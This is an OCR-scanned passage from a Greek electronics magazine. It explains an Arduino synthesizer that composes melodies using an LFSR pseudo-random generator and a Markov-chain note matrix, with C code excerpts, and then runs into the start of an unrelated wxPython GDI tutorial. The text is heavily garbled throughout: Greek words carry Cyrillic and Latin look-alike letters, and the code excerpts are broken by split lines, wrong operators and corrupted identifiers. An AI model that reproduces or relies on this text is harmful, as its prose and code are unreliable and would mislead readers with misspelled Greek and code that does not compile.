Σχεδὀν ruyaioi 


Ὅπως Ва δούμε αργότερα, η υλοποίηση τριών καναλιών ἠχου, η διατήρη- 
ση £vóc σταθερού ρυθμού αναπαραγωγἠς και η χρήση μοτίβων για κάθε 
κανάλι, δεν αποτελούν δύσκολα προβλήματα. H σπουδαιότερη npókAnon 
εντοπἰζεται στο μηχανισμὸ µε rov οποίο θα επιλέγεται κάθε фора η επὀ- 
pevn νότα. Αυτἠ η επιλογή θα πρέπει να γίνεται τυχαία, για να µην ακού- 
µε πάντα την ἴδια μελωδία, αλλά ταυτόχρονα θα πρέπει να ακολουθεἰ και 
κάποιους κανόνες, ὥστε η παραγόμενη μελωδία να παρουσιάζει κάποια 
δομή. Πριν ασχοληθούμε ре тоос κανόνες kai τον μηχανισμὸ nou θα τους 
εφαρμόζει, πρέπει να αντιμετωπίσουμε το ζήτημα της τυχαιότητας. Όπως 
αντιλαμβάνεστε, χρειαζόμαστε ¿vav μηχανισμὀ παραγωγἠς ψευδοτυχαί- 
ων αριθμών ἡ, όπως αλλιώς λέμε, ἑναν PRNG (Pseudo-Random Number 
Generator). Αναρωτιέστε γιατί μιλάμε για ψευδοτυχαίους κι ὀχι για апла 
τυχαίους αριθμούς; Ένα κομμάτι κὠδικα κάνει πάντοτε τα ἴδια ακριβώς 
πράγματα κι дра ἐχει προβλέψιµη συμπεριφορά. Επομένως, εἶναι αδύνατο 
va κατασκευάσουµε µια ρουτίνα η onoia θα δίνει *npayparikà* ruxaioug 
αριθμούς. Το μόνο που μπορούμε να κάνουμε εἶναι να κατασκευάσουµε 
µια ρουτίνα η οποία θα παράγει Ἀδύσκολα προβλέψιµους3” αριθμούς. Па 
τα δεδομένα της αντἰληψἠς µας οι αριθμοί αυτοί θα *рогасооу* ruyaioi. 


Απρόβλεπτη διαδοχἠ 


H συνάρτηση random υλοποιεί £vav PRNG και θα μπορούσε να λύσει το 
πρὀβλημἁ µας αμέσως. Ωστόσο, η εν λὀγω συνάρτηση εἶναι αρκετά αργή. 
Ἔτσι, αν κάθε φορὰ που πρέπει va επιλεγεἰ µια νότα καλεῖται μερικὲς 
φορὲς η random κι av ὀλη aut η καθυστέρηση επαναλαμβάνεται για 
κάθε κανάλι, το πρόγραμμα θα καθυστερεἰ αισθητά. Ως συνέπεια, η ava- 
παραγωγἠ θα παρουσιάζει απανωτὲς και μάλλον ενοχλητικὲς διακοπές. 
Μια εναλλακτική λύση θα ἦταν να διαβάζουμε κάποια αναλογικἠ εἶσοδο 
του Arduino, η οποία βρίσκεται στον αέρα”. H τάση σε švav τέτοιο ακρο- 
δέκτη καθορἰζεται σε μεγάλο βαθμὀ апо τις ηλεκτρικὲς διαταραχὲς του 
περιβάλλοντος χώρου και μπορούμε να θεωρήσουμε бт! μεταβάλλεται 
τυχαία! Δυστυχώς, ὅμως, η ανάγνωση µιας αναλογικἠς εισόδου καθυ- 
στερεί πολύ περισσότερο κι апо τη συνάρτηση random. Τελικά, yia va 
φτιάξουμε va synthesizer nou θα συνθέτει µουσικἠ «αυτόβουλα» και 
χωρὶς να κάνει αδικαιολὀγητες παύσεις, πρέπει να κατασκευάσουµε £vav 
ταχύτατο ΡΕΝΑ. 


Αυτὸ nou ζητάμε µπορεἰ να υλοποιηθεί µε τη βοήθεια ενὸς LFSR. Το 
ακρωνύμιο προκύπτει απὀ τις λέξεις Linear Feedback Shift Register, αλλά 
κάτι нас λέει ότι αυτἠ η επεξήγηση δεν βοηθά και πολύ апо µόνητης:)Ο 
μηχανισμός που περιγράφεται ως LFSR αποτελείται апо ἐναν καταχωρη- 
τή, του onoiou ra ψηφία (bit) ολισθαϊνουν διαρκὠς προς ша συγκεκριµέ- 
νη κατεύθυνση. Όπως αντιλαμβάνεστε, κάθε φορά που πραγματοποιείται 
αυτή η ολίσθηση προκύπτει ша κενἠ θέση. Αν, για παράδειγµα, η oAi- 
σθηση ἐχει κατεύθυνση προς ra αριστερά, σε κάθε βήμα της διαδικασίας 


2. Αυτό σηµαίνει ότι ο σχετικὀς ακροδέκτης δεν εἶναι συνδεδεμένος πουθενἀ στο κύκλωμα. 
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Εικόνα 1 

Н γραφική ava- 
παράσταση ενὀς 
Linear Feedback 
Shift Register. H 
συνάρτηση ауа- 
ὅρασης апотєЛєї- 
ται μόνο απὀ την 
πράξη XOR kai σε 
αυτήν συμμετέ- 
χουν τα bit 14 και 
15. Σε κάθε βήμα 
του LFSR εκτελεί- 
ται η πράξη XOR, 
ολισθαίνουν τα bits 
ката μία θέση προς 
τα αριστερά ка! 
στη θέση του про- 
του bit τοποθετεί- 
ται το αποτέλεσμα 
της ХОК. 
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απαιτεἰται ¿va v£o ψηφίο (bit) το οποίο θα τοποθετηθεἰ στην акра δεξιά 
θέση του καταχωρητή. E, λοιπόν, σε αυτἠ την θέση τοποθετείται éva bit, 
το οποίο προκύπτει апо µια γραμμική συνάρτηση κάποιων ἄλλων bit του 
καταχωρητή. Με αυτἠ την περιγραφἠ κατὰ νου και ρἰχνοντας µια ματιά 
στη σχετικἠ εικόνα, vouiGouus бт! θα φανεί αµέσως ro noc προέκυψε η 
ονομασία LFSR. Όπως εἶναι φανερό, η λειτουργία ενὸς τέτοιου µηχανι- 
оноо εἶναι απόλυτα προβλέψιµη. Ωστόσο, εἶναι εξαιρετικἀ δύσκολο για 
£vav ἄνθρωπο να προβλέψει τους αριθμούς που προκύπτουν µε αυτή 
τη διαδικασία. Έτσι, οι αριθμοί που παράγει ἑνας LFSR μοιάζουν ruyxaioi. 


16bit Linear Feedback Shift Register 


Ὀλίσθηση rov bit προς τα αριστερά... 


K CK NK NX СМЕ CAM CXÉ CAM YN ο NENE NE NENEN 


Υπολογισμός νέου bit... 


Ταχύτητα και απὀδοση 


H παραπάνω περιγραφὴ δημιουργεἰ δύο απορἱες: Τι µορφή ἐχει η συνάρ- 
τηση που παράγει το vo bit; Ποια bit συμμετέχουν σε αυτἠ τη cuváp- 
τηση; Κατ’ αρχάς, να σημειώσουμε ὁτι η εν λόγω συνάρτηση ονομάζεται 
και συνάρτηση ανάδρασης. Μπορεί va ἐχει σχεδὀν οποιαδήποτε) μορφή 
και σ΄’ αυτήν εἶναι δυνατὸ να συμμετέχουν ὁσα και ὁποια bit θέλουμε. 
Ωστόσο τίποτα апо όλα αυτά δεν επιλέγεται τυχαία! Αφενός, η рорфі 
της συνάρτησης επηρεάζει τη ταχύτητα του αντίστοιχου LFSR και φυ- 
σικἀ την ευκολία µε την οποία υλοποιείται. Αφετέρου, η επιλογἠ των bit 
καθορίζει το πλήθος των τιμών nou θα παράγει ο αντίστοιχος LFSR, πριν 
ολοκληρώσει vav κύκλο και αρχίσει να επαναλαμβάνεται. Στην απλού- 
στερη µορφή της, η συνάρτηση που υπολογίζει το νέο bit αποτελεἰται 
µόνο апо τη λογική πράξη XOR. Σ΄ αυτή την περίπτωση λέμε бт! ἐχουμε 
£vav Fibonacci LFSR και ὁπως υποψιάζεστε, αποτελεἰ το καθιερωμένο 
εἶδος LFSR. 


Ένας LFSR των 16bit µπορεί θεωρητικἁ να παράγει 2316 (265536) διαφο- 
ρετικὲς τιμές. AUTÒ όμως δεν συμβαίνει πάντα. Εἶναι βλέπετε δυνατὸ να 
δημιουργήσουμε ἑναν «φτωχό» 16µπιτο LFSR, ο οποίος θα παράγει kai θα 
ανακυκλώνει μερικὲς μόνο απὀ τις 65536 τιμὲς. Εξίσου δυνατὴ εἰναι και 
η κατασκευὴ του λεγόμενου maximal LFSR, ο οποίος θα παράγει όλους 
τους Ίθμπιτους αριθμούς. H συμπεριφορά του LFSR, yia µια δεδομένη 
συνάρτηση ανάδρασης, καθορἰζεται апо τα bit που συμμετέχουν στη OU- 
νάρτηση. Αυτά τα bit ονομάζονται tap. H επιλογἠ των κατάλληλων tap 
εἶναι κρἰσιµη για τις επιδόσεις ενός LFSR, ενώ εἶναι κι εξαιρετικἁ δύσκολη: 
εἶναι αδύνατο να προεξοφλήσουμε то αν κἄποια συγκεκριµένα taps οδη- 
γοὺν σε maximal LFSR ἡ ὀχι. O μόνος τρόπος yia να το διαπιστώσουμε Ei- 
vai va υπολογίσουμε pia προς pia τις τιμὲς που παράγονται! Τουλάχιστον 
για την περίπτωση των Fibonacci LFSR, αυτἠ η δουλειὰ ἐχει γίνει бп апо 
πάρα πολλούς και μάλιστα για διάφορα πιθανὰ μήκη. Ἔτσι, στο Internet 
υπάρχουν αρκετὲς λίστες στις οποίες αναφέρονται τα κατάλληλα tap για 
την κατασκευἠ ενὸς maximal LFSR, µε οποιοδήποτε μήκος. 


3. Λέμε «σχεδὀν» διότι η συνάρτηση θα πρέπει να εἶναι γραμμική. Τα κριτήρια γραμμικότητας για τις συναρ- 
τήσεις της ἀλγεβρας Boole θα τα βρείτε σε βιβλία... της άλγεβρας Boole ;-) 
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Παιχνίδι πιθανοτήτων 


Τελικά, yia τη δημιουργία ψευδοτυχαίων αριθμών το проүрарра θα ne- 
ριλαμβάνει ¿vav maximal Fibonacci LFSR. Έχοντας αντιμετωπίσει το 
ζήτημα της τυχαιότητας, μπορούμε να προχωρήσουμε στο ζήτημα της 
επιλογἠς της επόμενης νότας. Όπως εἰπαμε νωρίτερα, η μετάβαση апо 
νότα σε νότα δεν μπορεὶ να γίνεται εντελώς τυχαία, алла οὐτε και µε 
κάποια προκαθορισμένη σειρὰ. Επομένως, οι κανόνες που θα διέπουν 
αυτὲς τις μεταβάσεις πρέπει να στηρἰζονται στον παράγοντα της τύχης, 
χωρὶς όμως να αφήνουν τα πάντα σε αυτόν. Με άλλα λόγια, οι κανόνες 
θα πρέπει va παἰζουν µε τις πιθανότητες, ενώ ταυτόχρονα να θέτουν και 
κάποια обра. Ἑνας τέτοιος κανόνας θα μπορούσε va εἶναι ο ακόλουθος: 
Όταν παἱζεται η νότα 1 εἰναι 5% ni8avó να ακολουθήσει η νότα 2, 40% 
πιθανὸ να ακολουθήσει η νότα 3, 30% πιθανὀ να ακολουθήσει η νότα 4 
και 25% πιθανὸ να ακολουθήσει η νότα 5. Το проүрарра θα περιλαμβάνει 
£vav κανόνα αυτἠς της µορφήἠς για κάθε νότα, ὥστε κάθε фора να uno- 
λογίζει ποια θα εἶναι η επόμενη. 


Ένα σύνολο τέτοιων κανόνων εισάγει την τύχη στη διαδοχἠ των µουσι- 
Kov φθόγγων, алла ὀχι ισοπεδωτικἀ. Αυτό σημαίνει ὁτι το проүрарра 
θα εναλλάσσει τις νότες µε τυχαίο τρόπο, ενὠ ταυτόχρονα θα δείχνει και 
ορισμένες προτιμήσεις. Με τη σειρἁ τους, αυτὲς οι προτιμήσεις θα δηµι- 
ουργούν τελικἀ και την αἴσθηση µια συγκεκριμένης δομὴς: Τα μουσικἁ 
κομμάτια θα παράγονται τυχαία, алла θα έχουν αρκετὲς ομοιότητες. 


М, [Раз Po Pis Pia Pis Pis Рат Pis 
Na τσι Pas Pss Paza Pss Pag Poz Pa 
Ns δει Pao Pas Psa Pas Pas Pao Pas 
N4 Рах P42 Раз P44 Pas Pas Pay Рав 
Ns |Pui Ps2 Ps3 Psa Pss Pug Pez Ps8 
Ns [Рез Pes Рез Раа Pss Pss Pas Рев 
ντι Ру» Pos Род Рав Pze Рез Pos 


Αλυσίδες Markov 


Па va υλοποιήσουμε αποδοτικἀ £va σύνολο κανόνων της µορφής nou 
περιγράψαμε παραπάνω, πρέπει прота να σκεφτούμε λίγο αφηρημένα. 
Φανταστείτε τις νότες nou μπορεἰ να παΐξει το synthesizer σαν τις δια- 
φορετικὲς καταστάσεις στις οποίες µπορεί να περιέλθει ¿va σύστημα. Με 
μαθηματικούς ópouc, το τµήµα του προγράμματος που θα αποφασίζει 
ποια νότα πρέπει να παιχτεί, θα μπορούσε να περιγραφεὶ σαν µια μηχανὴ 
καταστάσεων (state machine). ΟΙ κανόνες που θέλουμε να υλοποιήσου- 
µε περιγράφουν το noc πραγματοποιείται η μετάβαση апо τη pia νότα 
στην ἄλλη. Κατ’ επέκταση, οι κανόνες περιγράφουν то πὼς μεταβαίνει 
το σύστημα απὀ τη μία κατάσταση στην ἄλλη. Σε αυτούς τους κανόνες 
συμμετέχει η τύχη, ενώ παἰζει ρόλο και η τρέχουσα νότα. Με ἄλλα λόγια, 
οι κανόνες λαμβάνουν υπόψη τους την τύχη, καθὼς και την τρέχουσα 
κατάσταση (state) του συστήματος. AUTÒ σημαίνει ὁτι οι νότες που ἐχουν 
προηγηθεί δεν επηρεάζουν καθόλου την εκάστοτε μετάβαση. Αντἰστοι- 


Εικόνα 2 

Н µαθηµατική ava- 
παράσταση µιας 
αλυσίδας Markov, 
yia ἑνα σύστηµα 
οκτώ καταστάσε- 
ων. Τα στοιχεία του 
πίνακα δηλώνουν 
την πιθανότητα 
µετόβασης απὀ την 
κατάσταση που 
δηλώνει η γραμμή, 
στην κατάσταση 
που δηλώνει η 
στήλη. 


Εικόνα 3 

Ti θα συνέβαινε 
στο synthesizer, αν 
χρησιμοποιούσαμε 
αυτή την αλυσίδα 
Markov; Πα κάθε 
γότα, η πιθανό- 
τητα να παιχτεί η 
αμέσως επόμενη 
θα ἦταν ion µε 

τη μονάδα, ενώ 

η οι πιθανότητες 
να παιχτεί κάποια 
ἆλλη νότα θα ἦταν 
μηδενικές. Επομέ- 
νως, το synthesizer 
θα ἐπαιζε όλες τις 
νότες µε τη σειρά, 
ξανά kai ξανὰ (και 
ξανά). 
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χα, οι προηγούμενες καταστάσεις 
N. № Ns № Ns № № Ns στις οποίες βρέθηκε το σύστημα 
0 δεν επηρεάζουν καθόλου τη pE- 


Nı [0100000 τάβαση στην επὀµμενη κατάσταση. 
N|0 0100000 Οι μηχανές καταστάσεων που па- 
Мз |0 0010000 ρουσιάζουν αυτή τη συμπεριφορά 
N,|00001000 χαρακτηρίζονται oç memoryless. 
Мм<|0 0000100 Τελικά, ο μηχανισμὸς που θέλου- 

µε να κατασκευάσουµε αποτελεὶ 
00000010 ἑνα memoryless state machine. 
N;|00000001 Αναρωτιέστε τι µας έπιασε και ap- 
N |1 0000000 χίσαμε να μιλάμε τόσο θεωρητικά; 


Οι μηχανές αυτού του εἶδους ovo- 
μάζονται Markov chains και η μαθηματική τους αναπαράσταση επιτυγχά- 
νεται µε τη βοήθεια ενὸς πίνακα. Αυτός ο πἰνακας ἐχει τόσες γραμμές και 
τόσες στήλες, ὁσες εἶναι οι καταστάσεις του αντἰστοιχου συστήματος. 
Κάθε στοιχείο αυτού του nivaka εκφράζει την πιθανότητα μετάβασης апо 
την κατάσταση που δηλώνει η γραμμὴ του στοιχείου, στην κατάσταση 
που δηλώνει η στήλη. Με απλά λόγια, οι πίνακες που αναπαριστούν της 
αλυσίδες Markov θυμίζουν τους πἰνακες χιλιομετρικὠν αποστάσεων. Μόνο 
που аут! για την απόσταση μεταξὺ οποιωνδήποτε δύο πόλεων, περιέχουν 
την πιθανότητα μετάβασης μεταξὺ οποιωνδήποτε δύο καταστάσεων. 


Παρατηρεἰστε την εικὀνα 2. Σε αυτήν βλέπουμε τη µαθηµατικἠ avana- 
ράσταση µιας αλυσίδας Markov. Προφανώς, εφόσον о πἰνακας της εικὀ- 
νας ἐχει διαστάσεις 8х8, οι κανόνες που µπορεί va µοντελοποιήσει θα 
αφορούν στις μεταβάσεις μεταξὺ окто διαφορετικών καταστάσεων. Av 
υποθέσουμε бт! το synthesizer που θα φτιάξουμε µπορεί να παίζει окто 
διαφορετικὲἐς νότες, τότε о πἰνακας της εικὀνας περιγράφει τους κανόνες 
διαδοχής rov μουσικῶν φθόγγων. Πα παράδειγμα, órav παἰζεται η νότα 
N3, η πιθανότητα να ακολουθήσει η νότα N1 εἶναι Ρ3 1, η πιθανότητα να 
ακολουθήσει η νότα N2 εἶναι Ρ3 2, η πιθανότητα να ακολουθήσει η νότα 
МЗ εἶναι Ρ3 3 και πάει λέγοντας. 


To πρόγραμμα 


Πριν ξεκινήσουμε την παρουσίαση του κὠδικα, να πούμε Or! µπορείτε va 
τον κατεβάσετε апо ro http://bit.ly/dhei8fmsynthv3. Ta νέα και ενδια- 
φέροντα στοιχεία του προγράμματος σχετἰζονται µε την παραγωγἠ των 
τριών καναλιών ἠχου, τη διατήρηση του ρυθμού, την υποστήριξη των 
beat pattern, την υλοποίηση rou LFSR και την αξιοποίηση ενὸς Markov 
Chain. Στη συνέχεια, λοιπὀν, θα εξετάσουμε ra πιο ζουµερά апоопайона- 
τα του κὠδικα. 


#define fm_depth1 11 // channel 1 
#define fm_decay1 5 

float fm_freq1 = 2; 

#define fm_depth2 11 // channel 2 
#define fm_decay2 4 

float fm_freq2 = 1.5; 

#define fm depth3 10 // channel 3 
#define fm decay3 7 

float fm freq3 = 3; 
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Εικόνα 4 

N M ΝΑ № Ns № № Ne Εδώ ro πρόγµα 

αρχίζει να μπλέκει 

Νι . . . . . . . . λίγο. Μ΄ аитп) την 
αλυσίδα Markov 

Ν 2 . . . . . . . . το synthesizer θα 


*érEIVE* να παίζει 
όλες τις νότες, μία 
προς μία και µε τη 

σειρά. Ωστόσο, 
ορισμένες φορές 
και µε σχετικἀ 
µικρή πιθανότητα, 
θα παρέκαµπτε 
µια νότα και θα 
προχωρούσε στην 
επόμενη. 
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Па την ταυτόχρονη παραγωγἠ ἑως και τριὼν μουσικῶν φθόγγων (тріа 
κανάλια), το πρὀγραμμα περιλαμβάνει ορισμένα τμήματα κὠδικα εις τρι- 
πλούν. Μεταξύ ἄλλων, περιλαμβάνει τρία σετ µε τις μεταβλητές και τις 
σταθερές, οι οποίες συμμετέχουν στο σχηματισμὀ ενὸς κύματος µε την 
τεχνικὴ ΕΜ. Στο παραπάνω απόσπασμα βλέπουμετις σταθερέἑς nou καθο- 
ρἰζουν ra χαρακτηριστικἁ της σύνθεσης FM για κάθε κανάλι. H λειτουργία 
κάθε καναλιού απαιτεἰ αρκετὲς ακόµα μεταβλητὲς (phase, phase. delta, 
sample. ptr, amp rise, amp. decay к.а.) kai, ὁπως υποψιάζεστε, το npó- 
үранна περιλαμβάνει τρία σετ κι апо αυτές. 


OCR2A = 128 + ((amp envelopel.bytes[1] * <1пе256[5атр1е_рїг1]) >> 10) + 
((amp_envelope2.bytes[1] * sine256[sample ptr2]) >> 10) + 
((amp_envelope3.bytes[1] * sine256[sample ptr3]) >> 10); 


Τα τρία κανάλια йҳоо συνεπάγονται την παραγωγἠ και την πρὀσθεση 
τριών κυμάτων. Ἔτσι, στη ρουτίνα υπολογισμού των δειγμάτων υπάρ- 
χουν τρία αντίγραφα του κὠδικα, ο οποίος υπολογίζει ra περιγράμμα- 
τα έντασης και υλοποιεί την τεχνικἠ ΕΜ για κάθε κανάλι. H παραπάνω 
γραμμὴ κὠδικα αποτελεἰ το τέλος αυτής της ρουτίνας, κατὰ ro onoio 
προστίθενται τα τρία δείγματα. Παρατηρεἰστε ὁτι κάθε δείγμα διαιρείται 
µε το 1024 (ολίσθηση προς τα δεξιὰ ката 10bit). Αυτό το κάνουμε yia να 
εξασφαλίσουμµε бт! το άθροισμα των δειγμάτων δεν θα υπερβαίνει το 255 
(η μέγιστη τιµή για то PWM). Αν θέλαμε να προσθέσουμε δύο κύματα (και 
ара δύο δείγματα) θα αρκούσε η διαίρεση µε ro 512 (ολίσθηση προς ra 
δεξιὰ ката 9018). Σε προηγούμενα προγράμματα που διέθεταν va µόνο 
κανάλι, αρκούσε η διαίρεση µε ro 256 (ολίσθηση προς τα δεξιά ката 8bit). 
Μιλώντας γενικά, αυτές οι διαιρέσεις αποτελούν ἑνα εἶδος normalization, 
το οποίο εξασφαλίζει ὁτι η πρὀσθεση των κυμάτων δεν θα προκαλέσει 
παραμόρφωση της εξόδου. 


/* 
30bpm -> 1Hz -> 32000 samples 
60bpm -> 1ΗΖ -» 16000 samples 
120bpm -» 2Hz -» 8000 samples 
150bpm -» 2.5Hz -» 6400 samples 
*/ 


unsigned int tempo = 16000; 
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Εικόνα 5 

Με αυτή την 
αλυσίδα Markov το 
synthesizer θα υἱο- 
θετούσε ακόµα πιο 
σύνθετη συμπερι- 
φορά. Σε γενικὲς 
γραμμές, θα ἐπαιζε 
όλες τις νότες µε 
τη σειρὰ. Μερικἐς 
φορές, ωστόσο, 
θα παρέκαµπτε 
κάποιες νότες ἡ θα 
επέστρεφε στην 
προηγούμενη ката 
σειρά. 
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Το σύστημα για τη διατήρηση ενὸς 
ρυθμού εἶναι αρκετἀ απλὀ. Το npó- 
γραμμα περιλαμβάνει ἐναν µετρη- 
τή, του οποίου η τιµή αυξάνει κάθε 
φορὰ που υπολογίζεται ἑνα δείγμα. 
Ὅμως n συχνότητα δειγματοληψίας 
του προγράμματος εἰναι 16KHz και 
ара p’ αυτὴ τη συχνότητα αυξάνει 
και O μετρητής. Ας υποθέσουμε 
тора бт! θέλουμε να εξασφαλἰσου- 
με ὁτι το synthesizer θα παἰζει µε 
ρυθμὸ 60bpm. Auró σημαίνει Ох! 
θα αναπαράγεται μία νότα ауа δευτερόλεπτο. Με άλλα λόγια, οι νότες θα 
εναλλάσσονται µε συχνότητα 1Hz. Προφανώς, αυτή η συχνότητα εἶναι 
16000 φορὲς μικρότερη anó τη συχνότητα αύξησης του μετρητή μας. 
Επομένως, κάθε фора που o μετρητἠς φτάνει στην τιμἠ 16000, ro npó- 
γράμμα πρέπει να παράγει µια νέα νότα, να μηδενἰζει το μετρητὴ και να 
ξεκινά µια νέα μέτρηση, μέχρι να φτάσει η opa yia την επόμενη νότα. H 
μεταβλητή tempo ορίζει ἑνα ὁριο yia τον µετρητή, το οποίο µε τη σειρά 
TOU ορἰζει ἐναν αντἰστοιχο ρυθμὀ αναπαραγωγἠς. 
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unsigned int beati = 0b1110111011101110; 
unsigned int beat2 - 0b0110010101000110; 
unsigned int beat3 - 0b0001000000010000; 


Σε каӨє χτύπο του ρυθμού, o κὠδικας ελἐγχει TO beat pattern του єкай- 
στοτε καναλιού. Συγκεκριμένα, ελέγχει το av ὀντως πρέπει να παιχτεί µια 
νότα ἡ av с’ αυτόν το χτύπο αντιστοιχεί µια παύση. Όπως, βλέπετε, та 
beat patterns αποθηκεύονται σε Ίθμπιτους αριθμούς. O! ἆσσοι αντιστοι- 
χούν στην αναπαραγωγἠ κάποιας νότας και τα μηδενικἁ αντιστοιχούν σε 
παύσεις. Σε κάθε χτύπο, το npóypaupa ελέγχει το επὀµμενο bit του beat 
pattern. Όταν ra bits τελειώσουν, ξεκινά апо την αρχή. 


void prng() í 
byte bitl = 
byte bit2 = 


(rnd_num.int_val & tap1) > 0; 
(rnd_num.int_val & tap2) > 0; 
rnd_num.int_val <<= 1; 

rnd_num.int_val |= (biti ^ bit2); 


} 


H παραπάνω ρουτίνα υλοποιεί ¿vav LFSR. Н τιµή της γεννήτριας Bpioke- 
ται αποθηκευμένη στη μεταβλητή rnd_num, η οποία ἐχει οριστεἰ σαν 
unsigned integer. Επομένως, πρὀκειται yia ἑναν Ίθμπιτο LFSR. Ta tap 
--τα bit που συμμετέχουν στη συνάρτηση ανάδρασης rou LFSR— βρἰσκο- 
ута! αποθηκευμένα στις μεταβλητές їар1 και tap2. O κὠδικας праүра- 
τοποιεἰ τη λογική πράξη AND μεταξύ αυτών των μεταβλητών και εκείνης 
που διατηρεἰ την τιμή του LFSR, ὥστε να απομονώσει τα αντίστοιχα bit. 
Σε κάθε εκτἐλεση της πράξης AND, ελέγχεται αν το αποτέλεσµα εἶναι 
μεγαλύτερο του μηδενὸς. Ουσιαστικά, µε δεδομένο бт! το αποτέλεσµα 
δεν θα μπορούσε να εἶναι αρνητικὀ, γίνεται ἐλεγχος του αν εἶναι διάφορο 
TOU μηδενὸς. Έτσι, αν то bit που απομονώθηκε апо την πράξη AND εἶχε 
την τιµή 1, το αποτέλεσμα του ελέγχου εἶναι TRUE. Αντίστοιχα, αν το bit 
ἧταν 0, το αποτέλεσμα του ελέγχου εἶναι FALSE. Με αυτόν τον τρόπο, 
TO πρὀγραµµα απομονώνει τις τιμὲς των δύο bit και τις αποθηκεύει στις 
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μεταβλητές biti και bit2. Ακολούθως, o καταχωρητής µε την τιµή του 
LFSR ολισθαϊνει ката µία θέση προς ra αριστερά. Σαν τελευταῖο βήμα, 
πραγματοποιείται η λογική πράξη XOR μεταξύ των biti και bit2 και то 
αποτέλεσμα «προστίθεται» στον καταχωρητὴ µε την λογική πράξη OR. 
Τελικά, κάθε φορὰ που καλείται η συνάρτηση prng, ο μηχανισμός LFSR 
παράγει ἑναν v£o yeuóooruyaio αριθμό. 


unsigned char matrix[8][8] = í 
0,80,40,80,0,50,0,0, 
0,0,80,40,80,0,50,0, 
0,0,0,80,40,80,0,50, 
50,0,0,0,80,40,80,0, 
0,50,0,0,0,80,40,80, 
80,0,50,0,0,0,80,40, 
40,80,0,50,0,0,0,80, 
80,40,80,0,50,0,0,0); 


To synthesizer που υλοποιήσαμε μπορεἰ va παἰζει окто νότες. 'ETOI, για 
την περιγραφἠ των κανόνων, οι οποίοι θα διέπουν τις μεταβάσεις апо 
νότα σε νότα, κατασκευάσαμε ¿vav nivaka 8x8. Αυτὸς ο πίνακας αποτελεὶ 
την αναπαράσταση µιας αλυσίδας Markov. Παρατηρεἰστε бт! οι τιμές του 
πίνακα, av και εκφράζουν πιθανότητες, ανήκουν στην περιοχἠ [0..255] 
και ὀχι στην [0..1]. Αυτό το κάναμε για λόγους απλὀτητας του κὠδικα 
και, κυρίως, yia να µην μπλέξουμε µε αριθμούς κινητἠς υποδιαστολής (ο 
χειρισμὸς τους εἶναι σχετικἀ χρονοβόρος). 


for (idx = 0; idx < 8; idx++) í 
prng(); 
if (matrix[note][idx] > rnd num.bytes[0]) break; 


} 
note = idx; 


Οι παραπάνω γραμμὲς αξιοποιούν την αλυσίδα Markov, που αναπαριστά 
o πἰνακάς рас. O βρὀχος for εξετάζει τα στοιχεία της ypauuñc, η οποία 
αντιστοιχεἰ στην τρἐχουσα νότα. Σε κάθε επανάληψη του βρὀχου, ο KO- 
δικας παἰρνει το λιγότερο σηµαντικὀ byte ενὸς τυχαίου αριθμού (όπως 
προκύπτει апо τον LFSR) και το συγκρίνει µε το αντίστοιχο στοιχείο TOU 
πίνακα. Με auróv τον τρόπο, o βρὀχος εκτελεἰ окто πειράµατα τύχης. Н 
ἐκβαση αυτών των πειραμάτων καθορίζει ποια θα εἶναι η επόμενη νότα. 


Πρακτικἠ εµπέδωση 


Επιλέγοντας προσεκτικἁ το ρυθμὸ του synthesizer και ορίζοντας ra ка- 
TQÀÀnÀq beat patterns, μπορούμε να δημιουργήσουμε πολλὲς διαφορετι- 
κὲς μελωδίες. Ωστόσο, ο μηχανισμός που επιτρέπει τη μέγιστη διαφορο- 
ποίηση στη μουσικὴ σύνθεση εἶναι η αλυσίδα Markov. Τροποποιώντας τις 
τιμὲς του αντἰστοιχου πίνακα, μπορούμε va επιβάλλουμε στο synthesizer 
οποιαδήποτε μουσικἠ προσωπικότητα! Βέβαια, αυτὀ εἶναι αρκετἁ δύσκολο 
να ro συλλάβει κανεἰς θεωρητικά. O καλύτερος τρόπος για να κατανοήσε- 
τε την επἰδραση της αλυσίδας Markov στη συμπεριφορά του synthesizer, 
εἶναι µε τη βοήθεια (πολλὠν) πειραµάτων. Ελπίζουμε va ra διασκεδάσετε! 


$6111: 
Intermediate 


Tags: Python, 
wxPython 


Στο προηγούμενο ἄρθρο κάναμε 
µια καλἠ εισαγωγἠ oro GDI και 
στις εφαρμογές που ελέγχουν 
απευθείας --ὀχι µέσω ἑτοιμων 
controls-- τα περιεχόμενα 
του παραθύρου τους. Όπως 
διαπιστώσατε, αυτέὲς εἶναι και οι 
£pappoy£gc που παρουσιάζουν 
το περισσότερο ενδιαφέρον 
και, ταυτόχρονα, το μεγαλύτερο 
βαθμὸ δυσκολίας. Βλέπετε, η 
διαχείριση και η εμφάνιση των 
δεδομένων της εφαρμογἠς 
αφήνεται ολοκληρωτικἁ στα 
χέρια του προγραμματιστή. 
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Av μελετήσατε το άρθρο ото deltaHacker 017, тора θα ёхєтє κατανοήσει 
τις παρακάτω έννοιες: 


ο Βασικἠ £vvoia σε ша εφαρμογἠ που χρησιμοποιεί то GDI εἶναι το 
DC (Device Context). Πρόκειται για το αντικείµενο που επιτρέπει 
τη σχεδίαση σε οποιαδήποτε συσκευἠ εξόδου, χωρὶς να µπλέκουμε 
µε τις ιδιαιτερὀτητὲς της. Το αντικείµενο αυτὀ συνοδεύεται апо 
αρκετά ακόµα, ὁπως ra Pens, ra Brushes, ra Colors к.а. 


ο Μπορούμε va avakrrjcouus ro DC µε δύο βασικούς τρόπους: Μέσω 
της wx.ClientDC, ὀταν η σχεδἰαση αποτελεἰ συνέπεια µιας δικἠς 
μας κίνησης (n.x., ο χρήστης ἑκανε κλικ στην οθόνη) και µέσω της 
wx.PaintDC, όταν το πρόγραμμα λαμβάνει ¿va μήνυμα επανασχεδἰ- 
ασης του παραθύρου, ως αποτἐλεσµα κάποιου «ατυχήματος». 


ο Μιλώντας για ατύχημα, εννοούμε την περίπτωση nou το παράθυρο 
του προγράμματος καλυφθεἰ апо κάποιο алло και µετά αποκαλυ- 
φθεἰ ξανά. Σε αυτἠ την περίπτωση, τα περιεχόμενα ¿xouv χαθεί και 
πρέπει να σχεδιαστούν εκ v£ou. Σε αντίθεση µε αυτὸ nou πιστεύ- 
ouv το 98% των προγραμματιστῶν Visual Basic, το λειτουργικὀ 
*oógv πρὀκειται; να ξανασχεδιάσει το περιεχόμενο του παραθύρου 
αυτόματα (θα φτιάξει μόνο ro περἰγραμμά rou). 


ο Εἱμαστε υποχρεωμένοι να γνωρίζουμε ауа паса στιγμὴ пос να 
σχεδιάζουμε οποιοδήποτε κομμάτι του περιεχομένου. П’ αυτὸ то 
λόγο, υπάρχει πάντα µια εσωτερικἠ αναπαράσταση των δεδομένων 
